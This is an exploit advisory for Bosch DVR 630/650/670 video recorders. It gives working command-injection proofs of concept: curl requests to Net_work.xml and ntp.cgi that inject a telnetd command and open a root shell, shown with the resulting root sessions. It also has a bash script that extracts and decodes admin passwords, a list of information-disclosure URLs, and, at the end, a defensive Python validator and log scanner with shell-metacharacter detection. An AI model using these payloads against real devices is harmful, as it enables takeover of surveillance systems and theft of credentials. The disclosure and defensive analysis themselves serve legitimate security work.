[ Discovered by dun \ posdub[at]gmail.com ] [ 2014-10-01 ]

###############################################################################
# [ Bosch Security Systems DVR 630/650/670 Series ] Multiple Vulnerabilities  #
###############################################################################
#
# Device: "The Bosch Video Recorder 630/650 Series is an 8/16
#          channel digital recorder that uses the latest H.264
#          compression technology. With the supplied PC
#          software and built-in web server, the 630/650 Series is
#          a fully integrated, stand-alone video management
#          solution that's ready to go, straight out of the box.
#          Available with a variety of storage capacities, the
#          630/650 Series features a highly reliable embedded
#          design that minimizes maintenance and reduces
#          operational costs. The recorder is also available with a
#          built-in DVD writer."
#
# Vendor:  http://www.boschsecurity.com/
# Product: DVR 630/650 http://resource.boschsecurity.us/documents/Data_sheet_enUS_1977239307.pdf
#          DVR 670     http://resource.boschsecurity.us/documents/DVR_670_Series_Data_sheet_enUS_7654294923.pdf
#
# Software Download:
# http://resource.boschsecurity.us/software/Software_DVR630_650_firmware_v212_all_1980902667.zip
# http://resource.boschsecurity.us/software/Software_DVR670_firmware_v212_enUS_8599929867.zip
#
# Timeline: 2014-10-01 Vulnerability discovered
#           2014-10-03 1 Contact with vendor - No response
#           2014-10-14 Published
#
###################################################################
# Gaining Root Shell Access [1]:

POST /Net_work.xml HTTP/1.1
Accept: */*
Accept-Language: pl
Referer: http://10.11.219.2/network.html
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: 10.11.219.2
Content-Length: 1274
DNT: 1
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: MosaLanguage=0; session=

0
10.11.219.2
255.255.255.0
10.11.219.1
0.0.0.0
0.0.0.0
10.11.219.2
255.255.255.0
10.11.219.1
0.0.0.0
0.0.0.0
80
0
1
wxss
ffl
|telnetd -l${SHELL} -p30 #
sdads
dsadsd
sdasdas
dasdas
0
0
0
0
0
0
0
0
0
0
25
0
0

## PoC:

root@debian:~# curl -i -s -k -X 'POST' -H 'Referer: http://10.11.219.2/network.html' -H 'Content-Type: text/xml; charset=UTF-8' \
  -H 'User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)' -H 'DNT: 1' \
  -b 'MosaLanguage=0; session=' --data-binary $'\x0d\x0a 0\x0d\x0a 10.11.219.2\x0d\x0a \
  255.255.255.0\x0d\x0a 10.11.219.1\x0d\x0a 0.0.0.0\x0d\x0a \
  0.0.0.0\x0d\x0a 10.11.219.2\x0d\x0a 255.255.255.0\x0d\x0a 10.11.219.1\x0d\x0a \
  0.0.0.0\x0d\x0a 0.0.0.0\x0d\x0a 80\x0d\x0a 0\x0d\x0a \
  1\x0d\x0a wxss\x0d\x0a ffl\x0d\x0a \
  |telnetd -l${SHELL} -p30 #\x0d\x0a \x0d\x0a \x0d\x0a \
  \x0d\x0a sdads\x0d\x0a dsadsd\x0d\x0a \
  sdasdas\x0d\x0a dasdas\x0d\x0a 0\x0d\x0a \
  0\x0d\x0a 0\x0d\x0a 0\x0d\x0a 0\x0d\x0a \
  0\x0d\x0a 0\x0d\x0a 0\x0d\x0a 0\x0d\x0a \
  0\x0d\x0a \x0d\x0a 25\x0d\x0a 0\x0d\x0a \x0d\x0a \
  \x0d\x0a \x0d\x0a \x0d\x0a \x0d\x0a \x0d\x0a \
  \x0d\x0a 0\x0d\x0a\x0d\x0a' 'http://10.11.219.2/Net_work.xml'

root@debian:~# telnet 10.11.219.2 30
Trying 10.11.219.2...
Connected to 10.11.219.2.
Escape character is '^]'.

BusyBox v1.1.2 (2009.12.29-03:59+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

/ # id
uid=0(root) gid=0(root)
/ # uname -a
Linux everfocus 2.6.24-rt1-hi3520v100 #9 Thu Sep 2 14:00:47 CST 2010 armv6l unknown
/ # ps |grep telnet
 2827 root        228 S   telnetd -l/bin/sh -p30
/ # netstat -ltn | grep 30
tcp        0      0 0.0.0.0:30              0.0.0.0:*               LISTEN
/ # echo pwnd & exit
pwnd
Connection closed by foreign host.
root@debian:~#

###################################################################
# Gaining Root Shell Access (authorization is needed) [2]:

GET /ntp.cgi?cmd=ntp_start&time_server=1&private_server=192.168.0.245|%20telnetd%20-l${SHELL}%20-p40;%20id&rnd=4392 HTTP/1.1
Accept: */*
Accept-Language: pl
Referer: http://10.11.219.2/system.html
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: 10.11.219.2
DNT: 1
Proxy-Connection: Keep-Alive
Cookie: MosaLanguage=0; session=

## PoC:

root@debian:~# curl -i -s -k -X 'GET' \
  -H 'Referer: http://10.11.219.2/system.html' \
  -H 'User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)' -H 'DNT: 1' \
  -b 'MosaLanguage=0; session=' 'http://10.11.219.2/ntp.cgi?cmd=ntp_start&time_server=1&private_server=192.168.0.245|%20telnetd%20-l${SHELL}%20-p40;%20id'

root@debian:~# telnet 10.11.219.2 40
Trying 10.11.219.2...
Connected to 10.11.219.2.
Escape character is '^]'.

BusyBox v1.1.2 (2009.12.29-03:59+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

/ # id
uid=0(root) gid=0(root)
/ # uname -a
Linux everfocus 2.6.24-rt1-hi3520v100 #9 Thu Sep 2 14:00:47 CST 2010 armv6l unknown
/ # ps |grep telnet
 2827 root        228 S   telnetd -l/bin/sh -p40
/ # netstat -ltn | grep 40
tcp        0      0 0.0.0.0:40              0.0.0.0:*               LISTEN
/ # echo pwnd & exit
pwnd
Connection closed by foreign host.
root@debian:~#

###################################################################
# Admin Password Disclosure:

http://10.11.219.2/User.cgi?cmd=get_user

## PoC Exploit:

#!/bin/bash
x=0;
for i in $(curl --silent http://10.11.219.2/User.cgi?cmd=get_user| sed 's/<[^>]\+>/ /g' | sed -r 's/(\s)+[0-9]//g'); do
    base64 -d<<<$i;
    if [ $(( $x % 2 )) -eq 0 ]; then echo -n ":"; else echo ; fi;
    ((x++));
done

###################################################################
# Sensitive Information Disclosure:

http://10.11.219.2/Config.cgi?cmd=system_info
http://10.11.219.2/System.xml
http://10.11.219.2/Net_work.xml
http://10.11.219.2/webcmd.html

/ # cat /4mosa600/data/Webcmd_help.txt
cmd                  value (sample)
====================+==========================
blockid             | 0 ~ block max   // show block info and flag and gop status.
--------------------+-------------------------
disk                |                 // show disk temp.
--------------------+-------------------------
reboot              |                 // restart DVR.
--------------------+-------------------------
remote-info         |                 // socket status.
--------------------+-------------------------
log                 | 1: System       // show system log.
                    | 2: Record
                    | 4: Login
                    | 8: Configure
                    | 16: Operation
                    | 31: All
                    | 63: Service
--------------------+-------------------------
ionly               | 1~12 how many frames in a GOP will send to internet
                    | 0: all I/P-frame (default)
                    | 1: I only
                    | 2: IP
                    | 3: IPP
                    | 4: IPPP
                    | ....
                    | 12: IPPPPPPPPPPP
                    | others: show current value on DVR.
--------------------+-------------------------
chlink              | 0~MKF_CHANNEL   // show channel link.
--------------------+-------------------------
bitrate             |                 // show bitrate information.
--------------------+-------------------------
dls                 |                 // show about time and DLS message.
--------------------+-------------------------
bmp                 |                 // dump bmp file to http://x.x.x.x/vga0.bmp
--------------------+-------------------------
msg                 | This is bitmap
                    | bit 0 show encode FPS and Bitrate.
                    | bit 1 show encode resolution.(dependent bit 1)
                    | bit 2 show remote client mesage.
                    | bit 3 show ptz command.
                    | bit 4 cpu and memory usage..
--------------------+-------------------------
remote-cgi          | 0 disable all cgi command.
                    | 1 show all cgi command to console.
                    | 2 show cig command if not "login_id"
--------------------+-------------------------
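The two root-shell findings above share one root cause: a configuration value (the NTP `private_server` parameter, a field in `Net_work.xml`) is handed to a shell unchecked, so `|`, `;` and `${...}` in it become commands. The following is an added example, not code from the advisory or from Bosch, written from the defender's side. It shows (a) the allowlist validation the CGI handlers should have applied to a server value before any system call, and (b) a small log scanner that flags requests to the disclosure endpoints listed above and shell metacharacters inside query parameters. The log layout (client, method, target, status) and the log lines themselves are constructed for the example; only the paths, parameter names and injection pattern come from the advisory.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Endpoints named in the advisory; the descriptions are this example's own wording.
SENSITIVE_PATHS = {
    "/User.cgi": "admin password disclosure (cmd=get_user)",
    "/Config.cgi": "system information disclosure (cmd=system_info)",
    "/System.xml": "configuration disclosure",
    "/Net_work.xml": "network configuration read/write",
    "/webcmd.html": "debug command console",
}

# Shell metacharacters that never belong in a hostname, IP address or similar
# configuration value: pipe, command separator, background, backtick, $( and ${.
SHELL_META = re.compile(r"[|;&`]|\$\(|\$\{")

# RFC 1123 style hostname: labels of letters/digits/hyphens joined by dots.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

# Constructed sample log (not captured traffic): client, method, target, status.
SAMPLE_LOG = """\
10.11.219.50 GET /ntp.cgi?cmd=ntp_start&time_server=1&private_server=192.168.0.245&rnd=1 200
10.11.219.50 GET /ntp.cgi?cmd=ntp_start&time_server=1&private_server=192.168.0.245|%20telnetd%20-l${SHELL}%20-p40;%20id&rnd=4392 200
10.11.219.50 GET /User.cgi?cmd=get_user 200
10.11.219.50 GET /index.html 200
10.11.219.50 POST /Net_work.xml 200
"""


def is_valid_server(value):
    """Allowlist check a CGI handler should run on a time-server value
    before it reaches any shell or system() call: an IP literal or a
    plain hostname passes, anything else is rejected."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME.match(value) is not None


def inspect(line):
    """Return a list of findings (strings) for one access-log line."""
    parts = line.split()
    if len(parts) < 4:
        return []  # malformed line: nothing to judge
    client, method, target = parts[0], parts[1], parts[2]
    url = urlsplit(target)
    findings = []
    if url.path in SENSITIVE_PATHS:
        findings.append(f"{client} {method} {url.path}: {SENSITIVE_PATHS[url.path]}")
    # parse_qs percent-decodes values, so %20 and friends are already resolved.
    for key, values in parse_qs(url.query, keep_blank_values=True).items():
        for value in values:
            if SHELL_META.search(value):
                findings.append(
                    f"{client} {method} {url.path}: shell metacharacter in "
                    f"parameter {key!r}: {value!r}"
                )
    return findings


def scan_log(text):
    """Run inspect() over every non-empty line and collect all findings."""
    findings = []
    for line in text.splitlines():
        if line.strip():
            findings.extend(inspect(line))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Run over the sample log the scanner reports three events: the injected `private_server` value, the `User.cgi?cmd=get_user` fetch and the `Net_work.xml` write. The validator is the fix side of the same issue: `is_valid_server` accepts `192.168.0.245` or `pool.ntp.org` and rejects the advisory's payload outright, which is what a CGI handler must do before it builds any command line, independently of whether a session cookie was present.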